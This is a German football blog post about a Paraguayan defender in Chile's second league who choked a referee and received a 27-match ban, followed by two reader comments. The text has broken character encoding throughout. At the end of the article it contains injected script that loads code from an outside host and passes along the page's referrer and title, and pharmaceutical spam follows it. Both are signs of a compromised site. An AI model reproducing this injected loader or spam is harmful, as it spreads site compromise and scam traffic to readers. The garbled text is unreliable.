Willkommen auf » Der paraguyaische Schiri-WA?rger
22. Jul 2010

Der paraguyaische Schiri-WA?rger

Nicht A?berall auf der FuAYballwelt geht’s momentan so geruhsam zu wie im in der Sommerpause schlummernden Europa.

Die sA?damerikanischen LAi??nder befinden sich z.B. noch mitten im Spielbetrieb, sodass man sich problemlos dort sein FuAYballfutter holen kann. In der zweiten chilenischen Liga gab es vor kurzem einen wirklich extremen Zwischenfall. Der paraguyaische Verteidiger Jose Pedroso vom C.S.D. Rangers tickte nach einer roten Karte vAi??llig aus, wA?rgte den Schiedsrichter und war im Anschluss nur schwer durch Mitspieler und SicherheitskrAi??fte von einem erneuten Angriff abzubringen.

Seht selbst…

Die Folge: Der chilenische Verband verhAi??ngte eine Rekordsperre von 27 Spielen!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; viagra online from canada. online online triamcinolone cost without insurance trazodone how much a pill orlistat 60. Pills buy cheap pfizer norvasc, cheap meds4u. Pills purchase vantines obtaining viagra without prescription. viagra without prescriptions uk bactroban nasal Order Order Buy


2 Kommentare



  1. so ein idiot. quasi für eine ganze saison gesperrt…wie blöd kann man nur sein?! o.O



  2. Tja, impulsive Südamerikaner :)
    Das Strafmaß ist schon krass, aber letztlich gerechtfertigt. Solche Aktionen muss man schon im Ansatz unterbinden.

Einen Kommentar schreiben